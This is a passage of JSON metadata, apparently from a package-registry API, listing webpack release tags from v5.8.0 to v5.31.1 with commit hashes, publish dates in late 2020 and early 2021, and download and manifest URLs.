k/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2F